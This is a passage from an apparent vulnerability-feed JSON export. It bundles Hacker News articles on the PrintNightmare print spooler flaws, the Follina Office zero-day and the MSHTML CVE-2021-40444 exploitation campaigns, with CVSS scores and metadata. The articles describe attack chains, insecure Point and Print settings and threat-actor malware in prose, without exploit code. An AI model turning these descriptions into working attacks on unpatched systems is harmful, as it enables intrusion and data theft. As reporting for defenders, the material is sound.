"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-08-03T15:36:00", "id": "VU:383432", "href": "https://www.kb.cert.org/vuls/id/383432", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:22", "description": "[](<https://thehackernews.com/images/-wbLrBJlJCfE/YOUa-690-KI/AAAAAAAADG0/6tT84mGPz6gQ_5vYBxhkEE_spk0LW4WpwCLcBGAsYHQ/s0/windows-patch-update.jpg>)\n\nMicrosoft has shipped an [emergency out-of-band security update](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#1646>) to address a critical zero-day vulnerability \u2014 known as \"PrintNightmare\" \u2014 that affects the Windows Print Spooler service and can permit remote threat actors to run arbitrary code and take over vulnerable systems.\n\nTracked as [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8), the remote code execution flaw impacts all supported editions of Windows. Last week, the company warned it had detected active exploitation attempts targeting the vulnerability.\n\n\"The Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system,\" the CERT Coordination Center said of the issue.\n\nIt's worth noting that PrintNightmare includes both remote code execution and a [local privilege escalation](<https://github.com/calebstewart/CVE-2021-1675>) vector that can be abused in attacks to run commands with SYSTEM privileges on targeted Windows machines.\n\n[](<https://thehackernews.com/images/-NzUbsCmtpLU/YOUekekqtnI/AAAAAAAADG8/HwnD7Xq3_iYftG9BrRvS1tJxIBOomRzXgCLcBGAsYHQ/s0/lpe.jpg>)\n\n\"The Microsoft update for CVE-2021-34527 only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" CERT/CC vulnerability analyst Will Dormann [said](<https://www.kb.cert.org/vuls/id/383432>).\n\nThis effectively means that the incomplete fix could still be used by a local adversary to gain SYSTEM privileges. As workarounds, Microsoft recommends stopping and disabling the Print Spooler service or turning off inbound remote printing through Group Policy to block remote attacks.\n\nGiven the criticality of the flaw, the Windows maker has issued patches for:\n\n * Windows Server 2019\n * Windows Server 2012 R2\n * Windows Server 2008\n * Windows 8.1\n * Windows RT 8.1, and\n * Windows 10 (versions 21H1, 20H2, 2004, 1909, 1809, 1803, and 1507)\n\nMicrosoft has even taken the unusual step of issuing the fix for Windows 7, which officially reached the end of support as of January 2020.\n\nThe [update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), however, does not include Windows 10 version 1607, Windows Server 2012, or Windows Server 2016, for which the Redmond-based company stated patches will be released in the forthcoming days.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-07T03:11:00", "type": "thn", "title": "Microsoft Issues Emergency Patch for Critical Windows PrintNightmare Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T03:38:13", "id": "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "href": "https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[](<https://thehackernews.com/images/-4tveTym6-fk/YOZ_5ZwEbHI/AAAAAAAADHs/xXSCpfsipXYpe6tJM2SGaTIDUE9dVGoGwCLcBGAsYHQ/s0/PrintNightmare-Vulnerability-Patch.jpg>)\n\nEven as Microsoft [expanded patches](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center>) for the so-called [PrintNightmare vulnerability](<https://thehackernews.com/2021/07/how-to-mitigate-microsoft-print-spooler.html>) for Windows 10 version 1607, Windows Server 2012, and Windows Server 2016, it has come to light that the fix for the remote code execution exploit in the Windows Print Spooler service can be bypassed in certain scenarios, effectively defeating the security protections and permitting attackers to run arbitrary code on infected systems.\n\nOn Tuesday, the Windows maker issued an [emergency out-of-band update](<https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html>) to address [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8) after the flaw was accidentally disclosed by researchers from Hong Kong-based cybersecurity firm Sangfor late last month, at which point it emerged that the issue was different from another bug \u2014 tracked as [CVE-2021-1675](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) \u2014 that was patched by Microsoft on June 8.\n\n\"Several days ago, two security vulnerabilities were found in Microsoft Windows' existing printing mechanism,\" Yaniv Balmas, head of cyber research at Check Point, told The Hacker News. \"These vulnerabilities enable a malicious attacker to gain full control on all windows environments that enable printing.\"\n\n\"These are mostly working stations but, at times, this relates to entire servers that are an integral part of very popular organizational networks. Microsoft classified these vulnerabilities as critical, but when they were published they were able to fix only one of them, leaving the door open for explorations of the second vulnerability,\" Balmas added.\n\nPrintNightmare stems from bugs in the Windows [Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler>) service, which manages the printing process inside local networks. The main concern with the threat is that non-administrator users had the ability to load their own printer drivers. This has now been rectified.\n\n\"After installing this [update] and later Windows updates, users who are not administrators can only install signed print drivers to a print server,\" Microsoft [said](<https://support.microsoft.com/en-us/topic/july-7-2021-kb5004948-os-build-14393-4470-out-of-band-fb676642-a3fe-4304-a79c-9d651d2f6550>), detailing the improvements made to mitigate the risks associated with the flaw. \"Administrator credentials will be required to install unsigned printer drivers on a printer server going forward.\"\n\nPost the update's release, CERT/CC vulnerability analyst Will Dormann cautioned that the patch \"only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" thereby allowing attackers to abuse the latter to gain SYSTEM privileges on vulnerable systems.\n\nNow, further testing of the update has revealed that exploits targeting the flaw could [bypass](<https://twitter.com/gentilkiwi/status/1412771368534528001>) the [remediations](<https://twitter.com/wdormann/status/1412813044279910416>) entirely to gain both local privilege escalation and remote code execution. To achieve this, however, a [Windows policy](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/printing/use-group-policy-to-control-ad-printer>) called '[Point and Print Restrictions](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/group-policy/point-print-restrictions-policies-ignored>)' must be enabled (Computer Configuration\\Policies\\Administrative Templates\\Printers: Point and Print Restrictions), using which malicious printer drivers could be potentially installed.\n\n\"Note that the Microsoft update for CVE-2021-34527 does not effectively prevent exploitation of systems where the Point and Print NoWarningNoElevationOnInstall is set to 1,\" Dormann [said](<https://www.kb.cert.org/vuls/id/383432>) Wednesday. Microsoft, for its part, [explains in its advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) that \"Point and Print is not directly related to this vulnerability, but the technology weakens the local security posture in such a way that exploitation will be possible.\"\n\nWhile Microsoft has recommended the nuclear option of stopping and disabling the Print Spooler service, an [alternative workaround](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) is to enable security prompts for Point and Print, and limit printer driver installation privileges to administrators alone by configuring the \"RestrictDriverInstallationToAdministrators\" registry value to prevent regular users from installing printer drivers on a print server.\n\n**UPDATE:** In response to CERT/CC's report, Microsoft [said](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) on Thursday:\n\n\"Our investigation has shown that the OOB [out-of-band] security update is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare. All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-08T04:35:00", "type": "thn", "title": "Microsoft's Emergency Patch Fails to Fully Fix PrintNightmare RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-09T09:52:49", "id": "THN:CAFA6C5C5A34365636215CFD7679FD50", "href": "https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:23", "description": "[](<https://thehackernews.com/images/-RJ_0BYkTxHY/YN7HyUD-_KI/AAAAAAAA4SA/dbXcZli9DPwTnJvla5sgZ3hDzIqO8zLRgCLcBGAsYHQ/s0/windows-print-spooler-vulnerability.jpg>)\n\nMicrosoft on Thursday officially confirmed that the \"**PrintNightmare**\" remote code execution (RCE) vulnerability affecting Windows Print Spooler is different from the issue the company addressed as part of its Patch Tuesday update released earlier this month, while warning that it has detected exploitation attempts targeting the flaw.\n\nThe company is tracking the security weakness under the identifier [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), and has assigned it a severity rating of 8.8 on the CVSS scoring system. All versions of Windows contain the vulnerable code and are susceptible to exploitation.\n\n\"A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\" Microsoft said in its advisory. \"An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\n\"An attack must involve an authenticated user calling RpcAddPrinterDriverEx(),\" the Redmond-based firm added. When reached by The Hacker News, the company said it had nothing to share beyond the advisory.\n\nThe acknowledgment comes after researchers from Hong Kong-based cybersecurity company Sangfor [published](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) a technical deep-dive of a Print Spooler RCE flaw to GitHub, along with a fully working PoC code, before it was taken down just hours after it went up.\n\n[](<https://thehackernews.com/images/-Zl5E2TyZRFQ/YN7Ej6s8x8I/AAAAAAAA4R4/FEYZ4JpYdakscU9e8eXMl9VEI0Hl1P_SwCLcBGAsYHQ/s0/ms.jpg>)\n\nThe disclosures also set off speculation and debate about whether the June patch does or does not protect against the RCE vulnerability, with the CERT Coordination Center [noting](<https://kb.cert.org/vuls/id/383432>) that \"while Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have Point and Print configured with the NoWarningNoElevationOnInstall option configured.\"\n\nCVE-2021-1675, originally classified as an elevation of privilege vulnerability and later revised to RCE, was remediated by Microsoft on June 8, 2021.\n\nThe company, in its advisory, noted that PrintNightmare is distinct from CVE-2021-1675 for reasons that the latter resolves a separate vulnerability in RpcAddPrinterDriverEx() and that the attack vector is different.\n\nAs workarounds, Microsoft is recommending users to disable the Print Spooler service or turn off inbound remote printing through Group Policy. To reduce the attack surface and as an alternative to completely disabling printing, the company is also advising to check membership and nested group membership, and reduce membership as much as possible, or completely empty the groups where possible.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T05:36:00", "type": "thn", "title": "Microsoft Warns of Critical \"PrintNightmare\" Flaw Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-03T07:11:54", "id": "THN:9CE630030E0F3E3041E633E498244C8D", "href": "https://thehackernews.com/2021/07/microsoft-warns-of-critical.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T17:38:47", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgi3RXvGtPoTC8ufDqadLbye4bhkJjWs-Un41xcwOWrqQPpLekG-pG0Xxk-or-GInK-LQOG7QDpCF3p4FVNPMxdNLSsl4TgenAVq4LOJcfYcZ0LcgQ0zlwru8TY2ff5ffd7EEPtwFERwA4hDGj0uKeJYZBw1AGUroAFwL-QXSJrDONv8gHe7E2ghPpr/s728-e100/hacking-code.jpg>)\n\nCybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems.\n\nThe vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document (\"[05-2022-0438.doc](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection>)\") that was uploaded to VirusTotal from an IP address in Belarus.\n\n\"It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code,\" the researchers [noted](<https://twitter.com/nao_sec/status/1530196847679401984>) in a series of tweets last week.\n\nAccording to security researcher Kevin Beaumont, who dubbed the flaw \"Follina,\" the maldoc leverages Word's [remote template](<https://attack.mitre.org/techniques/T1221/>) feature to fetch an HTML file from a server, which then makes use of the \"ms-msdt://\" URI scheme to run the malicious payload.\n\nThe shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso.\n\n[MSDT](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msdt>) is short for Microsoft Support Diagnostics Tool, a utility that's used to troubleshoot and collect diagnostic data for analysis by support professionals to resolve a problem.\n\n\"There's a lot going on here, but the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled,\" Beaumont [explained](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>).\n\n\"[Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View,\" the researcher added.\n\nIn a standalone analysis, cybersecurity company Huntress Labs detailed the attack flow, noting the HTML file (\"RDF842l.html\") that triggers the exploit originated from a now-unreachable domain named \"xmlformats[.]com.\"\n\n\"A Rich Text Format file (.RTF) could trigger the invocation of this exploit with just the Preview Pane within Windows Explorer,\" Huntress Labs' John Hammond [said](<https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug>). \"Much like CVE-2021-40444, this extends the severity of this threat by not just 'single-click' to exploit, but potentially with a 'zero-click' trigger.\"\n\nMultiple Microsoft Office versions, including Office, Office 2016, and Office 2021, are said to be affected, although other versions are expected to be vulnerable as well.\n\nWhat's more, Richard Warren of NCC Group [managed](<https://twitter.com/buffaloverflow/status/1530866518279565312>) to demonstrate an exploit on Office Professional Pro with April 2022 patches running on an up-to-date Windows 11 machine with the preview pane enabled.\n\n\"Microsoft are going to need to patch it across all the different product offerings, and security vendors will need robust detection and blocking,\" Beaumont said. We have reached out to Microsoft for comment, and we'll update the story once we hear back.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T09:40:00", "type": "thn", "title": "Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-30T15:44:33", "id": "THN:E7762183A6F7B3DDB942D3F1F99748F6", "href": "https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:18", "description": "[](<https://thehackernews.com/images/-3vEprTVA4BI/YULvTEzYNCI/AAAAAAAADz0/RpSk1fU9GbcY7e98Gg2r8aBRvy73Z52kACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nMicrosoft on Wednesday disclosed details of a targeted phishing campaign that leveraged a now-patched zero-day flaw in its MSHTML platform using specially-crafted Office documents to deploy Cobalt Strike Beacon on compromised Windows systems.\n\n\"These attacks used the vulnerability, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>), as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders,\" Microsoft Threat Intelligence Center [said](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in a technical write-up. \"These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.\"\n\nDetails about CVE-2021-40444 (CVSS score: 8.8) first [emerged](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) on September 7 after researchers from EXPMON alerted the Windows maker about a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users by taking advantage of a remote code execution vulnerability in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"The observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document,\" the researchers noted. Microsoft has since [rolled out a fix](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) for the vulnerability as part of its Patch Tuesday updates a week later on September 14.\n\nThe Redmond-based tech giant attributed the activities to related cybercriminal clusters it tracks as DEV-0413 and DEV-0365, the latter of which is the company's moniker for the emerging threat group associated with creating and managing the Cobalt Strike infrastructure used in the attacks. The earliest exploitation attempt by DEV-0413 dates back to August 18.\n\nThe exploit delivery mechanism originates from emails impersonating contracts and legal agreements hosted on file-sharing sites. Opening the malware-laced document leads to the download of a Cabinet archive file containing a DLL bearing an INF file extension that, when decompressed, leads to the execution of a function within that DLL. The DLL, in turn, retrieves remotely hosted shellcode \u2014 a custom Cobalt Strike Beacon loader \u2014 and loads it into the Microsoft address import tool.\n\nAdditionally, Microsoft said some of the infrastructures that were used by DEV-0413 to host the malicious artifacts were also involved in the delivery of BazaLoader and Trickbot payloads, a separate set of activities the company monitors under the codename DEV-0193 (and by Mandiant as UNC1878).\n\n\"At least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack,\" the researchers said. \"It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.\"\n\nIn an independent investigation, Microsoft's RiskIQ subsidiary attributed the attacks with high confidence to a ransomware syndicate known as Wizard Spider aka Ryuk, noting that the network infrastructure employed to provide command-and-control to the Cobalt Strike Beacon implants spanned more than 200 active servers.\n\n\"The association of a zero-day exploit with a ransomware group, however remote, is troubling,\" RiskIQ researchers [said](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>). It suggests either that turnkey tools like zero-day exploits have found their way into the already robust ransomware-as-a-service (RaaS) ecosystem or that the more operationally sophisticated groups engaged in traditional, government-backed espionage are using criminally controlled infrastructure to misdirect and impede attribution.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T07:19:00", "type": "thn", "title": "Windows MSHTML 0-Day Exploited to Deploy Cobalt Strike Beacon in Targeted Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-12T15:17:20", "id": "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "href": "https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:04", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjYUPLUjcZm_IOi_2W8OCO67vRS3dKYHbn9uyV27yUDW18dhUv8jXFX9JDvQYw6FCzwj__3eQkTEwAOG-s6nigko_jBV77WQl46SxYEsGMQxc5g2hIFfR11hGm-vi1oobscaw6jTNgq2ed6ZN5OE9wz9JHWzNk0PH1xq9WzsWMs18Gk_P_yhPWT0YQm>)\n\nA new Iranian threat actor has been discovered exploiting a now-addressed critical flaw in the Microsoft Windows MSHTML platform to target Farsi-speaking victims with a previously undocumented PowerShell-based information stealer designed to harvest extensive details from infected machines.\n\n\"[T]he stealer is a PowerShell script, short with powerful collection capabilities \u2014 in only ~150 lines, it provides the adversary a lot of critical information including screen captures, Telegram files, document collection, and extensive data about the victim's environment,\" SafeBreach Labs researcher Tomer Bar [said](<https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/>) in a report published Wednesday.\n\nNearly half of the targets are from the U.S., with the cybersecurity firm noting that the attacks are likely aimed at \"Iranians who live abroad and might be seen as a threat to Iran's Islamic regime.\"\n\nThe phishing campaign, which began in July 2021, involved the exploitation of CVE-2021-40444, a remote code execution flaw that could be exploited using specially crafted Microsoft Office documents. The vulnerability was [patched](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) by Microsoft in September 2021, weeks after [reports](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) of active exploitation emerged in the wild.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgHnByMecpjc8CwGXlYLKRdnKgH6K5l2WpL2UN8Tsn4OgwoQxswAm4WoSD9d7rUtLNPFN59Z11rRxwTC3ZRa4tu-3rpZvcB0cO59nDNhYGmpe6L38Tx8Y-merXNp54673AbqS20eHA5cJ4CBUQ0KjBxCH5it3HfxkZ0_bBtO1JWp3_1j6rxKqM_SMJv>)\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" the Windows maker had noted.\n\nThe attack sequence described by SafeBreach begins with the targets receiving a spear-phishing email that comes with a Word document as an attachment. Opening the file triggers the exploit for CVE-2021-40444, resulting in the execution of a PowerShell script dubbed \"PowerShortShell\" that's capable of hoovering sensitive information and transmitting them to a command-and-control (C2) server.\n\nWhile infections involving the deployment of the info-stealer were observed on September 15, a day after Microsoft issued patches for the flaw, the aforementioned C2 server was also employed to harvest victims' Gmail and Instagram credentials as part of two phishing campaigns staged by the same adversary in July 2021. \n\nThe development is the latest in a string of attacks that have capitalized on the MSTHML rendering engine flaw, with Microsoft previously [disclosing](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that abused the vulnerability as part of an initial access campaign to distribute custom Cobalt Strike Beacon loaders.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T11:33:00", "type": "thn", "title": "Hackers Using Microsoft MSHTML Flaw to Spy on Targeted PCs with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-22T07:07:24", "id": "THN:C4188C7A44467E425407D33067C14094", "href": "https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:47", "description": 